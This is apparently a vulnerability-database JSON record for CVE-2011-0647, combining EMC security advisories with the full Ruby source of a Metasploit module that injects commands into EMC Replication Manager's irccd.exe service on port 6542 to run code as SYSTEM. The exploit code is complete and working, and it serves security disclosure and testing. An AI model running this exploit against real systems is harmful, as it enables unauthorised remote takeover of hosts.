EMC disclaims all warranties, either\r\nexpress or implied, including the warranties of merchantability, fitness for a particular purpose, title and non-infringement. In no event\r\nshall EMC or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business\r\nprofits or special damages, even if EMC or its suppliers have been advised of the possibility of such damages. Some states do not allow the\r\nexclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.\r\n\r\n\r\nEMC Product Security Response Center\r\nSecurity_Alert@EMC.com\r\nhttp://www.emc.com/contact-us/contact/product-security-response-center.htm\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (Cygwin)\r\n\r\niEYEARECAAYFAk2TRAsACgkQtjd2rKp+ALzQPgCg16IfNvkKmL3PBKjwDaqcLdUe\r\nOIYAoInkqtn75kfeFISDeDiN6yBpZUxZ\r\n=bEH1\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-03-31T00:00:00", "published": "2011-03-31T00:00:00", "id": "SECURITYVULNS:DOC:26042", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:26042", "title": "ESA-2011-012: Security update for EMC NetWorker Module for Microsoft Applications", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-0647"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nESA-2011-004: EMC Replication Manager remote code execution vulnerability\r\n\r\n\r\nEMC Identifier: ESA-2011-004\r\nCVE Identifier: CVE-2011-0647\r\n\r\n\r\nSeverity Rating: CVSS v2 Base Score: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)\r\n\r\n\r\nAffected products:\r\nEMC Replication Manager earlier than 5.3\r\nEMC NetWorker Module for Microsoft Applications 2.1.x (contains EMC\r\nReplication Manager)\r\nEMC NetWorker Module for Microsoft Applications 2.2.x (contains 
EMC\r\nReplication Manager)\r\n\r\n\r\nVulnerability Summary:\r\nA vulnerability exists in EMC Replication Manager which may allow arbitrary\r\ncode execution on vulnerable installations of the EMC Replication Manager.\r\n\r\n\r\nVulnerability Details:\r\nEMC Replication Manager contains a potential vulnerability that may allow\r\nremote unauthenticated user to execute arbitrary code on vulnerable\r\ninstallations of the EMC Replication Manager.\r\n\r\n\r\nProblem Resolution:\r\nThe following EMC products contain resolutions to this issue:\r\n\r\n\r\nEMC Replication Manager 5.3 and later\r\n\r\n\r\nEMC strongly recommends that all customers upgrade to latest version of the\r\nproducts, which contain the resolution to this issue, at the earliest\r\nopportunity.\r\n\r\n\r\nNote on timing of this announcement:\r\n\r\n\r\nEMC developed a fix for this vulnerability which was released in Q3 2010 as\r\npart of a regular RM release 5.3. Because Networker Module for Microsoft\r\nNMM) embeds RM code, NMM users were also determined to be vulnerable. NMM\r\nwill be releasing a fix for this vulnerability later this quarter (Q1 2011),\r\nwhich will resolve the issue. To protect NMM users, EMC chose to not\r\nannounce the RM fix until now. EMC is now announcing in synchronization with\r\npublic disclosure by ZDI. EMC is unaware of any known exploits of this\r\nvulnerability.\r\n\r\n\r\nLink to remedies:\r\n\r\n\r\nRegistered EMC Powerlink customers can download software from Powerlink.\r\n\r\n\r\nFor Replication Manager Software, navigate in Powerlink to Home > Support >\r\nSoftware Downloads and Licensing > Downloads P-R > Replication Manager.\r\n\r\n\r\nBecause the view is restricted based on customer agreements, you may not\r\nhave permission to view certain downloads. 
Should you not see a software\r\ndownload you believe you should have access to, follow the instructions in\r\nEMC Knowledgebase solution emc116045.\r\n\r\n\r\nFor explanation of Severity Ratings, refer to EMC Knowledgebase solution\r\nemc218831. EMC recommends that all customers take into account both the base\r\nscore and any relevant temporal and environmental scores, which may impact\r\nthe potential severity associated with particular security vulnerability.\r\n\r\n\r\nCredits:\r\nEMC would like to thank an anonymous researcher working with TippingPoint's\r\nZero Day Initiative (http://www.zerodayinitiative.com) for reporting this\r\nissue.\r\n\r\n\r\nEMC Corporation distributes EMC Security Advisories in order to bring to the\r\nattention of users of the affected EMC products important security\r\ninformation. EMC recommends all users determine the applicability of this\r\ninformation to their individual situations and take appropriate action. The\r\ninformation set forth herein is provided "as is" without warranty of any\r\nkind. EMC disclaims all warranties, either express or implied, including the\r\nwarranties of merchantability, fitness for a particular purpose, title and\r\nnon-infringement. In no event shall EMC or its suppliers be liable for any\r\ndamages whatsoever including direct, indirect, incidental, consequential,\r\nloss of business profits or special damages, even if EMC or its suppliers\r\nhave been advised of the possibility of such damages. 
Some states do not\r\nallow the exclusion or limitation of liability for consequential or\r\nincidental damages so the foregoing limitation may not apply.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (Cygwin)\r\n\r\niEYEARECAAYFAk1RU9wACgkQtjd2rKp+ALxmlACeKZG5lWael9gzPdEBORsFq/va\r\nS6MAoKxjl8ftuwuNBotq7UAv0jW0dSQO\r\n=nGSy\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2011-02-14T00:00:00", "published": "2011-02-14T00:00:00", "id": "SECURITYVULNS:DOC:25708", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:25708", "title": "ESA-2011-004: EMC Replication Manager remote code execution vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-05-21T18:59:46", "description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager client (irccd.exe). By sending a specially crafted message invoking RunProgram function an attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected products are EMC Replication Manager < 5.3. This module has been successfully tested against EMC Replication Manager 5.2.1 on XP/W2003. 
EMC Networker Module for Microsoft Applications 2.1 and 2.2 may be vulnerable too, although this module has not been tested against these products.\n", "published": "2013-10-17T14:51:34", "type": "metasploit", "title": "EMC Replication Manager Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-0647"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/EMC/REPLICATION_MANAGER_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'EMC Replication Manager Command Execution',\n 'Description' => %q{\n This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking RunProgram function an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. 
EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too although this module have not been tested\n against these products.\n },\n 'Author' =>\n [\n 'Unknown', #Initial discovery\n 'Davy Douhine' #MSF module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2011-0647' ],\n [ 'OSVDB', '70853' ],\n [ 'BID', '46235' ],\n [ 'URL', 'http://www.securityfocus.com/archive/1/516260' ],\n [ 'ZDI', '11-061' ]\n ],\n 'DisclosureDate' => 'Feb 07 2011',\n 'Platform' => 'win',\n 'Arch' => ARCH_X86,\n 'Payload' =>\n {\n 'Space' => 4096,\n 'DisableNops' => true\n },\n 'Targets' =>\n [\n # Tested on Windows XP and Windows 2003\n [ 'EMC Replication Manager 5.2.1 / Windows Native Payload', { } ]\n ],\n 'CmdStagerFlavor' => 'vbs',\n 'DefaultOptions' =>\n {\n 'WfsDelay' => 5\n },\n 'DefaultTarget' => 0,\n 'Privileged' => true\n ))\n\n register_options(\n [\n Opt::RPORT(6542)\n ])\n end\n\n def exploit\n execute_cmdstager({:linemax => 5000})\n end\n\n def execute_command(cmd, opts)\n connect\n hello = \"1HELLOEMC00000000000000000000000\"\n vprint_status(\"Sending hello...\")\n sock.put(hello)\n result = sock.get_once || ''\n if result =~ /RAWHELLO/\n vprint_good(\"Expected hello response\")\n else\n disconnect\n fail_with(Failure::Unknown, \"Failed to hello the server\")\n end\n\n start_session = \"EMC_Len0000000136<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><ir_message ir_sessionId=0000 ir_type=\\\"ClientStartSession\\\" <ir_version>1</ir_version></ir_message>\"\n vprint_status(\"Starting session...\")\n sock.put(start_session)\n result = sock.get_once || ''\n if result =~ /EMC/\n vprint_good(\"A session has been created. 
Good.\")\n else\n disconnect\n fail_with(Failure::Unknown, \"Failed to create the session\")\n end\n\n run_prog = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?> \"\n run_prog << \"<ir_message ir_sessionId=\\\"01111\\\" ir_requestId=\\\"00000\\\" ir_type=\\\"RunProgram\\\" ir_status=\\\"0\\\"><ir_runProgramCommand>cmd /c #{cmd}</ir_runProgramCommand>\"\n run_prog << \"<ir_runProgramAppInfo><?xml version="1.0" encoding="UTF-8"?> <ir_message ir_sessionId="00000" ir_requestId="00000" \"\n run_prog << \"ir_type="App Info" ir_status="0"><IR_groupEntry IR_groupType="anywriter" IR_groupName="CM1109A1" IR_groupId="1" \"\n run_prog << \">&lt;?xml version=&quot;1.0&quot; encoding=&quot;UTF-8&quot;?\t&gt; &lt;ir_message ir_sessionId=&quot;00000&quot; \"\n run_prog << \"ir_requestId=&quot;00000&quot;ir_type=&quot;App Info&quot; ir_status=&quot;0&quot;&gt;&lt;aa_anywriter_ccr_node&gt;CM1109A1\"\n run_prog << \"&lt;/aa_anywriter_ccr_node&gt;&lt;aa_anywriter_fail_1018&gt;0&lt;/aa_anywriter_fail_1018&gt;&lt;aa_anywriter_fail_1019&gt;0\"\n run_prog << \"&lt;/aa_anywriter_fail_1019&gt;&lt;aa_anywriter_fail_1022&gt;0&lt;/aa_anywriter_fail_1022&gt;&lt;aa_anywriter_runeseutil&gt;1\"\n run_prog << \"&lt;/aa_anywriter_runeseutil&gt;&lt;aa_anywriter_ccr_role&gt;2&lt;/aa_anywriter_ccr_role&gt;&lt;aa_anywriter_prescript&gt;\"\n run_prog << \"&lt;/aa_anywriter_prescript&gt;&lt;aa_anywriter_postscript&gt;&lt;/aa_anywriter_postscript&gt;&lt;aa_anywriter_backuptype&gt;1\"\n run_prog << \"&lt;/aa_anywriter_backuptype&gt;&lt;aa_anywriter_fail_447&gt;0&lt;/aa_anywriter_fail_447&gt;&lt;aa_anywriter_fail_448&gt;0\"\n run_prog << \"&lt;/aa_anywriter_fail_448&gt;&lt;aa_exchange_ignore_all&gt;0&lt;/aa_exchange_ignore_all&gt;&lt;aa_anywriter_sthread_eseutil&gt;0&\"\n run_prog << \";lt;/aa_anywriter_sthread_eseutil&gt;&lt;aa_anywriter_required_logs&gt;0&lt;/aa_anywriter_required_logs&gt;&lt;aa_anywriter_required_logs_path\"\n run_prog << 
\"&gt;&lt;/aa_anywriter_required_logs_path&gt;&lt;aa_anywriter_throttle&gt;1&lt;/aa_anywriter_throttle&gt;&lt;aa_anywriter_throttle_ios&gt;300\"\n run_prog << \"&lt;/aa_anywriter_throttle_ios&gt;&lt;aa_anywriter_throttle_dur&gt;1000&lt;/aa_anywriter_throttle_dur&gt;&lt;aa_backup_username&gt;\"\n run_prog << \"&lt;/aa_backup_username&gt;&lt;aa_backup_password&gt;&lt;/aa_backup_password&gt;&lt;aa_exchange_checksince&gt;1335208339\"\n run_prog << \"&lt;/aa_exchange_checksince&gt; &lt;/ir_message&gt;</IR_groupEntry> </ir_message></ir_runProgramAppInfo>\"\n run_prog << \"<ir_applicationType>anywriter</ir_applicationType><ir_runProgramType>backup</ir_runProgramType> </ir_message>\"\n run_prog_header = \"EMC_Len000000\"\n run_prog_packet = run_prog_header + run_prog.length.to_s + run_prog\n\n vprint_status(\"Executing command....\")\n sock.put(run_prog_packet)\n sock.get_once(-1, 1)\n\n end_string = Rex::Text.rand_text_alpha(rand(10)+32)\n sock.put(end_string)\n sock.get_once(-1, 1)\n disconnect\n\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/emc/replication_manager_exec.rb"}]}